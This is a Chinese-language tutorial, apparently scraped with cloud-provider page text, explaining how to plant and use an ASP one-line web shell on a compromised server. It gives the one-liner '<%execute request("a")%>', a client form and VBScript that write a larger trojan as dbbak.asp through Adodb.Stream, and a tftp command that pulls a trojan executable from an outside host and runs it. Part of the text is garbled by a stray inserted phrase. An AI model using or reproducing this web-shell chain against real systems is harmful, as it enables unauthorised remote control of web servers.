1)只有Database Backup的情況
Database Backup成asp檔案時候,不出現“ 編譯錯誤,缺少指令碼關閉標誌%>"
2)SA許可權的時候,一般先寫入一句話,圖個方便..(當然,直接tftp上傳鴿子運行,那更快)
tftp -i ip get server.exe
一句話木馬<%execute request("a")%>的原理:
首Crowdsourced Security Testing道
execute()函數,是用來執行asp代碼的.就是負責執行我們上傳的大馬,將馬交由asp.dll解析.上面的代碼<%execute request("a")%>可以這樣來解釋:
<%
if request("a")<>"" then execute request("a")
%>
如果a不為空白的時候執行.執行什麼呢?...
if a != 0
下面我們來看一下用戶端:
<form action=http://192.168.0.28/shell.asp method=post>
<textarea name=l cols=120 rows=10 width=45>
set lP=server.CreateObject("Adodb.Stream") '建立Adodb.Stream組件..
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("p")
lP.SaveToFile server.mappath("dbbak.asp"),2
lP.Close
set lP=nothing
response.redirect "dbbak.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45>要提交的資料</textarea><BR><center><br>
<input type=submit value=提交>
Adodb.Stream負責上傳讀取資料到伺服器:
組件:"Adodb.Stream"
有下列方法:
Cancel 方法
使用方法如下
Object.Cancel
說明:取消執行掛起的非同步 Execute 或 Open 方法的調用。
WriteText 方法
使用方法如下:
Object.Write(Data,[Options])
說明:將指定的文本資料裝入對像中。
參數說明:Data 為指定的要寫入的內容。
Options 寫入的選項,可不指定,選擇性參數如下:
adWriteChar =0
adWriteLine =1
SaveToFile 方法
使用方法如下:
Object.SaveToFile(FileName,[Options])
說明:將對像的內容寫到FileName指定的檔案中
也就是我們儲存木馬的檔案名稱dbbak.asp
參數說明:FileName指定的檔案
Options 存取的選項,可不指定,選擇性參數如下:
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
提交一句話木馬後,a的值為空白 等待一個寫入的值 訪問http://www.***.com/**.asp就是等待的過程 如何準備用execute()這個函數來執行...
建立一個Adodb.Stream,負責把我們的大馬寫入到伺服器當中...
同時,這個組件定義的變數SaveToFile定義了我們大馬的名字..dbbak.asp
提交到伺服器後execute()函數檢測到a的值不為空白了,所以就執行了我們的大馬!
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
